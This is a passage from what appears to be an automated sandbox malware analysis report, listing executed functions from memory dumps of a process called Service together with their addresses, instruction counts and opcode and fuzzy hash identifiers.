                                • Instruction Fuzzy Hash: F221F1B5604204DFDF25DF10D9C4B26BB75FF983A4F20C569E80D4A246C33AD856CAA2
                                Function 0077D5B3 Relevance: .1, Instructions: 56COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000019.00000002.1881062271.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_25_2_77d000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                • Instruction ID: 2ee9101ee0dfec77bdcd2288fb8d73beaac7b09e026ef9b2b193ba6c27961d4c
                                • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                • Instruction Fuzzy Hash: 5511AC76504284CFCF16CF14D9C4B16BF72FB94364F24C6A9D8094B256C33AD85ACBA2

                                Executed Functions

                                Function 02160D95 Relevance: .5, Instructions: 470COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.1902299210.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_2160000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 85c701e6aaf18d790c5395aff75aaba4b4a114ea99d6065951c848580a32d81e
                                • Instruction ID: 99fb20e9fb90d5561625c56bd9d3d160e99601428f4fcd931b5f4e25b13cebe9
                                • Opcode Fuzzy Hash: 85c701e6aaf18d790c5395aff75aaba4b4a114ea99d6065951c848580a32d81e
                                • Instruction Fuzzy Hash: 87515D346003458FCB59FB74F86D56E7BB2BBC9602300CA69D5168B3A5EF389D05CB85
                                Function 02161010 Relevance: .2, Instructions: 250COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.1902299210.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_2160000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 880e18a42db9ec6a82dc7b63a0968875f2b28779bac402cadd4572be16c1464e
                                • Instruction ID: 74a8d378e483b3a9928711d5e68fdfab599b92c2ff2c141a1ea12eeb83d47add
                                • Opcode Fuzzy Hash: 880e18a42db9ec6a82dc7b63a0968875f2b28779bac402cadd4572be16c1464e
                                • Instruction Fuzzy Hash: FA91B0307003058FCB49EB38E86DA6E7BB2BFC9601B108569E516DB3A5EF349D05CB85
                                Function 02161157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.1902299210.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_2160000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f4b38222db90fbccf6cd00d18d59ac56f6d2db5573b337316ab2ed0c34d6a637
                                • Instruction ID: e2c5317b1e41e17d794288662ae3a76e47545f80f31fb25a3e194bd652dfac64
                                • Opcode Fuzzy Hash: f4b38222db90fbccf6cd00d18d59ac56f6d2db5573b337316ab2ed0c34d6a637
                                • Instruction Fuzzy Hash: EE318F31700B058BDB59BB79982823E76E3BFC55053508A6EC41BCB790DF399E049BD6
                                Function 02161740 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.1902299210.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_2160000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c07d112455c18f65b1d967a2659a5082c3312fb8b2e33c1c6c08da885d13408
                                • Instruction ID: 8b31c49d6446cddeb9b62a12858d132cbb2677b5b259539acef89434e0d7b7e3
                                • Opcode Fuzzy Hash: 5c07d112455c18f65b1d967a2659a5082c3312fb8b2e33c1c6c08da885d13408
                                • Instruction Fuzzy Hash: B9318F74D00309DFDB45EBB8E8596AEBBB2FF88301F108969D406AB354DB705A44CF51
                                Function 02161860 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.1902299210.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_2160000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b42e2c7185ceb8a969a57ebd9200e608475a70bf92af877fb58c24a02dcbf63
                                • Instruction ID: b154090f4467d36a47ae087e212e2f58cae10a573c0ea8bf6816e344f293020e
                                • Opcode Fuzzy Hash: 8b42e2c7185ceb8a969a57ebd9200e608475a70bf92af877fb58c24a02dcbf63
                                • Instruction Fuzzy Hash: F621A571B002149FDB18EBBD581936FBAEBEFC9640B10842DD44BD7391DE399D0197A1
                                Function 02161750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.1902299210.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_2160000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f8a95496c1507cc4560824b26d38c19e88f9db439b909ee7762b227089d25f05
                                • Instruction ID: bdcde9a26748c95a194dfac5212ed4486f06c0ad93625dc34f367af9564ed028
                                • Opcode Fuzzy Hash: f8a95496c1507cc4560824b26d38c19e88f9db439b909ee7762b227089d25f05
                                • Instruction Fuzzy Hash: F3215C74900309DFDB45FBB8E8496ADBBB6FF88301F108969D506AB354DB705A40CF55
                                Function 02160939 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.1902299210.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_2160000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d7875eb0ca77fc0ab5793df1600231af9395ec4befbac16a14cb3ad983610bef
                                • Instruction ID: 8faeee277978269ba2ab4fc0b3cc68ca3db35faeea98f9704dec0c528b3742bd
                                • Opcode Fuzzy Hash: d7875eb0ca77fc0ab5793df1600231af9395ec4befbac16a14cb3ad983610bef
                                • Instruction Fuzzy Hash: DE21A130A05208DFCB48EBB8D8593AEBBF5EF89304F1484A9D4099B295DB755D14CB91
                                Function 02160848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001A.00000002.1902299210.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_2160000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 994e205b9a31c16fc50cb892cac8ca9431d468b1d7eb9f09a0bde72aa0657380
                                • Instruction ID: 57292e90f534c3d611809960dbcd937ab223031ad2642177ac403e616a57daae
                                • Opcode Fuzzy Hash: 994e205b9a31c16fc50cb892cac8ca9431d468b1d7eb9f09a0bde72aa0657380
                                • Instruction Fuzzy Hash: D411897411131ADFDB02FF28F98AA557BA9F788706B00DA54D5258F32DDB7069098F81

                                Executed Functions

                                Function 00F613B8 Relevance: .3, Instructions: 327COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.1913518478.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_f60000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90347a333f0f6f03fccbc8c32d25a8131d14e64c76a775d1699fcb202bfb2ffe
                                • Instruction ID: 363adf35ff4ae3cc7c715ac58bcc35caf62187c202d386ad7520660f8c8c277f
                                • Opcode Fuzzy Hash: 90347a333f0f6f03fccbc8c32d25a8131d14e64c76a775d1699fcb202bfb2ffe
                                • Instruction Fuzzy Hash: F4B1A035B002188FEB18EB74D85476E7BB6BFC8740F19896DE406EB395CE359C02A791
                                Function 00F60D95 Relevance: .5, Instructions: 476COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.1913518478.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_f60000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c7150aa490a4765e4990b4e36e94588ab18d30a01bfd00f94c858f502bb45a2b
                                • Instruction ID: 62c41138ab6e4ea65512639a353fca6c27d57d3460698643b39b513ea8c2403a
                                • Opcode Fuzzy Hash: c7150aa490a4765e4990b4e36e94588ab18d30a01bfd00f94c858f502bb45a2b
                                • Instruction Fuzzy Hash: 46515F346007158FDB56FB74E86856E7BA2BF882023408A39D41AC73A5FF349D499FA1
                                Function 00F61010 Relevance: .3, Instructions: 251COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.1913518478.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_f60000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 89061d643b6cad88f3f65b465e5cfa7bef4eeef5854ce5742af1d48e07052919
                                • Instruction ID: fb9d8c7af5e583c156506354af7d9987adeae4428f81809ea129f031290568e1
                                • Opcode Fuzzy Hash: 89061d643b6cad88f3f65b465e5cfa7bef4eeef5854ce5742af1d48e07052919
                                • Instruction Fuzzy Hash: 039182347003158FDB55FB78E858A6E7BB2FFC8601B108969D40ACB3A5EF349D059BA1
                                Function 00F61157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.1913518478.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_f60000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 19dd99ad543c1f5046c142511d52dada75e1ba2537a2db81623dc1e9b6315eb5
                                • Instruction ID: 42a2e56123749556a05874e61c5c5654465e43158130e13ac1b7b47054c04e0a
                                • Opcode Fuzzy Hash: 19dd99ad543c1f5046c142511d52dada75e1ba2537a2db81623dc1e9b6315eb5
                                • Instruction Fuzzy Hash: 2E317031700B118BDBA9AB79982452E76E2BFC46153508E2DC01BCB790EF35DE045BE2
                                Function 00F61860 Relevance: .1, Instructions: 85COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.1913518478.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_f60000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f69818944a2e44349b324f7734d135cf77847d8374ef89e0203569255e9336af
                                • Instruction ID: f48d9402ea5d067ed86a3494ab94d8c8456a490c582a85f9c698db84af78a48c
                                • Opcode Fuzzy Hash: f69818944a2e44349b324f7734d135cf77847d8374ef89e0203569255e9336af
                                • Instruction Fuzzy Hash: A4219D71B003048FDB54EBB9881936EBAAAEFC8611B20842ED84BD3381DE349D0567A1
                                Function 00F61740 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.1913518478.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_f60000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4ee9eb7b686f5453d34dfacdbcf62ee34fd0327a652b298e76fa822550c9f89d
                                • Instruction ID: 0b478881ab5721242a3360ba77b974eac2267b7b0e8e42b5a0759ace51496eb6
                                • Opcode Fuzzy Hash: 4ee9eb7b686f5453d34dfacdbcf62ee34fd0327a652b298e76fa822550c9f89d
                                • Instruction Fuzzy Hash: CA317E74A00309DFDB45EFB8D8557ADBBB2FF88301F208A69D405AB345EB346A45CB52
                                Function 00F60939 Relevance: .1, Instructions: 73COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.1913518478.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_f60000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0eb7b4c0405be64d41df8a989615a6d18180c756e433dcc59bafd9f4428bc070
                                • Instruction ID: 98a6a008dd47b1b9c58eccfa5bc6b9c855761de5ea9a2eaad4b068b380399ae4
                                • Opcode Fuzzy Hash: 0eb7b4c0405be64d41df8a989615a6d18180c756e433dcc59bafd9f4428bc070
                                • Instruction Fuzzy Hash: D8219230F052048FDB44DBB8D8556EE7BA2EF85344F248079D44AD7396EA748D06D791
                                Function 00F61750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.1913518478.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_f60000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2608810ff8db7b2850bd2ba739f45732f552fefd368cca38e095eb707e65342c
                                • Instruction ID: ff8755da12a2e928fec1c74ee2d5c0d8110c6e42821067465647d16d9d61e4c0
                                • Opcode Fuzzy Hash: 2608810ff8db7b2850bd2ba739f45732f552fefd368cca38e095eb707e65342c
                                • Instruction Fuzzy Hash: 23213D74A00309DFDB45FBB8D8457ADBBB6FF88301F108A69D405A7345EB345A44CB52
                                Function 00F60828 Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.1913518478.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_f60000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1d4371285257bffb0704a6789d10033cc4c95bc948c1080a0c3e3a155771341
                                • Instruction ID: 19a855adeab10aaeb450ffb043d44b66c746fde17a5b9c354776768dcc5ca361
                                • Opcode Fuzzy Hash: e1d4371285257bffb0704a6789d10033cc4c95bc948c1080a0c3e3a155771341
                                • Instruction Fuzzy Hash: 4D21E9741153568FEB13EB38FC90A893F75FB85607700DAA5D4048B26FE778694ACB82
                                Function 00F60848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001B.00000002.1913518478.0000000000F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_f60000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b9a3ff4d2d5f0956bd6aec02e0550d50b11fe1513881f6d883a826d4bd0bf417
                                • Instruction ID: 43c98d61d2ef7cc73e1803868231dfba9f56f7a28989e18487daebcd517f2aec
                                • Opcode Fuzzy Hash: b9a3ff4d2d5f0956bd6aec02e0550d50b11fe1513881f6d883a826d4bd0bf417
                                • Instruction Fuzzy Hash: 3D119D7410131A9FEB12FF28FD80A457BB5FB88607B10DA54D4148B22EE7786D49CF82

                                Executed Functions

                                Function 00740D95 Relevance: .5, Instructions: 470COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001C.00000002.1912890919.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_28_2_740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 65030e8d91b1ff7e7d533b840ed4a17df2bdb72a756b03a9070ac41e33fd3f81
                                • Instruction ID: 1b9dc7f253cc0b373cce76f047f0bf6d8a61f3a0dfad3e4d3cd3b6a16e4e198d
                                • Opcode Fuzzy Hash: 65030e8d91b1ff7e7d533b840ed4a17df2bdb72a756b03a9070ac41e33fd3f81
                                • Instruction Fuzzy Hash: F1517B346053458FCB06FF75E8A867E7BA7BB88352740AA68D4078B674EF349D04CB81
                                Function 00741010 Relevance: .2, Instructions: 250COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001C.00000002.1912890919.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_28_2_740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8f9e586f898cf035a2b5c4591cf6a5a7fd07b49b2e9b1d0995ac2835482ab631
                                • Instruction ID: fdefcef88fa54a67f882a50cccdf6538383795f3522ea79b86444797db6ea018
                                • Opcode Fuzzy Hash: 8f9e586f898cf035a2b5c4591cf6a5a7fd07b49b2e9b1d0995ac2835482ab631
                                • Instruction Fuzzy Hash: 81918B347003158FCB06EB35E8A8A6E7BB7BB88351B105969E406CB3A5EF309D05CB91
                                Function 00741157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001C.00000002.1912890919.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_28_2_740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ff103d6e915c05a1020023bd8f59e361b2ac097a4a37341267ef58dcdb3c38e7
                                • Instruction ID: d8fdd470fc9a66c7a2246412f6ac249efaf6d029f202b92f359bbc3508ab72a9
                                • Opcode Fuzzy Hash: ff103d6e915c05a1020023bd8f59e361b2ac097a4a37341267ef58dcdb3c38e7
                                • Instruction Fuzzy Hash: 8B317831300B448BDB59BB79986427E7AE3BFC46053808A6DC017CBB90DF359E049BE2
                                Function 00741860 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001C.00000002.1912890919.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_28_2_740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 686e46a19356b3614ec3366acba3ea41c7050a9c006e9dd6694007e38b1acb99
                                • Instruction ID: 496e34056a203784eba6e206e1ed747f62f4c49965359e67c95e1184b9364249
                                • Opcode Fuzzy Hash: 686e46a19356b3614ec3366acba3ea41c7050a9c006e9dd6694007e38b1acb99
                                • Instruction Fuzzy Hash: 0C21CD61B013149BDB48EBBA481836FBAEBEFC8750B20842DE54BD7381DE348C0197A5
                                Function 00741750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001C.00000002.1912890919.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_28_2_740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a134a7f5218b95dd1cf992868100f79ad4c0db80dac0a1fd934c96b3aa713b99
                                • Instruction ID: d4e6d13ee4bb11241e92d761072f2696f17ee81e91749e9b939f6909f367d6fb
                                • Opcode Fuzzy Hash: a134a7f5218b95dd1cf992868100f79ad4c0db80dac0a1fd934c96b3aa713b99
                                • Instruction Fuzzy Hash: 97214F74901309DFDB45FBB8D8957AEBBB6FF88311F104669D405A7354DB306A40CB91
                                Function 00740939 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001C.00000002.1912890919.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_28_2_740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0e132c14d33d773f83d01c4da9c6909ddf321afadca6b702bf7c01d703cbc3f7
                                • Instruction ID: 0c6e41391862ba20d6a4421447a46c4d7ca82b8f990945e4e35c716066f6358c
                                • Opcode Fuzzy Hash: 0e132c14d33d773f83d01c4da9c6909ddf321afadca6b702bf7c01d703cbc3f7
                                • Instruction Fuzzy Hash: 3D21C230A052488FDB44EFB8D5557AD7FB2AF85300F2484ADD509DB292DB345D05D781
                                Function 00740828 Relevance: .1, Instructions: 61COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001C.00000002.1912890919.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_28_2_740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e6777a33c613a9e3e5f8d4857a333ed41bff3545a4055c11b17c3e4b1e287178
                                • Instruction ID: 7b079c281e65bf16e4a1022415d9c44f88f73fec7703685edfaf70e9f9068c88
                                • Opcode Fuzzy Hash: e6777a33c613a9e3e5f8d4857a333ed41bff3545a4055c11b17c3e4b1e287178
                                • Instruction Fuzzy Hash: C721E9341053568FDB03FF28F9D4A4A3B79BB91755F04AA95D804CB26ED7706909CBC1
                                Function 00740848 Relevance: .0, Instructions: 47COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001C.00000002.1912890919.0000000000740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_28_2_740000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 72c05970caad0c984a399056164839a0da81fd11ae33e0e6a7e8cf557acb3047
                                • Instruction ID: 6b954c14e4ca52680d365865cb4c150131e7e2fab0ef8161a665dcd9308de9c5
                                • Opcode Fuzzy Hash: 72c05970caad0c984a399056164839a0da81fd11ae33e0e6a7e8cf557acb3047
                                • Instruction Fuzzy Hash: E311663420131A9FDB42FF28F9C4A5A7BAEF794756F00AE5498048B22DD7706A09CFC1

                                Executed Functions

                                Function 016913ED Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID: Ij
                                • API String ID: 0-1760422038
                                • Opcode ID: 2c5703b06812c3cbf8cae504026fc0fc102cca91c36323861c9aa403417bc9e3
                                • Instruction ID: 3f8d360c52975d159795d2f2557323fb2a98da39373e38dacbaeffa0d0d4e3f0
                                • Opcode Fuzzy Hash: 2c5703b06812c3cbf8cae504026fc0fc102cca91c36323861c9aa403417bc9e3
                                • Instruction Fuzzy Hash: 4D91A270F043198BDF18AF74985427E77B7BFC9750B19896EE406EB3A8CE3498028791
                                Function 01690D95 Relevance: .5, Instructions: 471COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a0e61c097879af7407e12ae190fd3606e77640ff1799dc3be6396d016ed42d48
                                • Instruction ID: 01e04cf517d02fec7b963b3de1d2c676a3b214fc2b277578f849acaca08b7643
                                • Opcode Fuzzy Hash: a0e61c097879af7407e12ae190fd3606e77640ff1799dc3be6396d016ed42d48
                                • Instruction Fuzzy Hash: 2C5181317003058FDB28AB75E86856E7BB6FBC46023808A29E816C77B5EF74DD458F91
                                Function 01691010 Relevance: .2, Instructions: 249COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5a63648829c5f96780ddeb2d4d3fe4da494b9d641b6303b13847491555cc2202
                                • Instruction ID: beecb85712b2d2057b999ec44345e0b644167ea3c4eb4315a03890b2e1b9ae5c
                                • Opcode Fuzzy Hash: 5a63648829c5f96780ddeb2d4d3fe4da494b9d641b6303b13847491555cc2202
                                • Instruction Fuzzy Hash: F89190307003158FDB18AB75E868A2E7BB6FFC8601B504669E416CB3B6DF74DC458B91
                                Function 01691157 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f62ac47042e130a067841fec9b5c140ca4f087bcb12af0fc76ff4094aa6bd5bc
                                • Instruction ID: 84fe97816698563f21ba3e0fc2b1724f52aae9ade8914d8f88fba35b64f17245
                                • Opcode Fuzzy Hash: f62ac47042e130a067841fec9b5c140ca4f087bcb12af0fc76ff4094aa6bd5bc
                                • Instruction Fuzzy Hash: 8531AF317007418BDB69BB79982413E76E6BFC49153908A2ED01BCB7A4DF31DD019BD1
                                Function 01691740 Relevance: .1, Instructions: 78COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 044c63186c50d4c3cb8f96acff35338c62b39e686e325094b17bb3b76716b047
                                • Instruction ID: 2c38aa05bcda441632204db75f130ba87bf3f5173e4da391d340a41379e9f35b
                                • Opcode Fuzzy Hash: 044c63186c50d4c3cb8f96acff35338c62b39e686e325094b17bb3b76716b047
                                • Instruction Fuzzy Hash: AD319E7090030ADFDB04EFB9D8547AEBBB6FF88205F204669E815AB354EB745E81CB51
                                Function 01691860 Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ee83ee6e8de22337b35f5713d49ab451783b17b39ff201bcc1bc1e08c7e8a6be
                                • Instruction ID: 08f8fe34e55b5b9a3d4a36cca38831993697a9410beb851f76158adf6cd3333c
                                • Opcode Fuzzy Hash: ee83ee6e8de22337b35f5713d49ab451783b17b39ff201bcc1bc1e08c7e8a6be
                                • Instruction Fuzzy Hash: 9521C671B003159BEB18ABBE481436FB9EFEFD8611B10842ED44BD3350DE349C0157A1
                                Function 01691750 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9a85728ae312facef13d4e32285b0f22e9d41d3f5394449c8705e61478de536d
                                • Instruction ID: d5c9bf5f02d15a90813f513ae0018653d01ab1f5616985dfb0061f63ef196270
                                • Opcode Fuzzy Hash: 9a85728ae312facef13d4e32285b0f22e9d41d3f5394449c8705e61478de536d
                                • Instruction Fuzzy Hash: D0215170900309DFDB05EFB9D9446AEBBB6FF88601F104669E815AB354EBB45EC0CB51
                                Function 01690939 Relevance: .1, Instructions: 70COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000001D.00000002.1914312878.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_29_2_1690000_Service.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
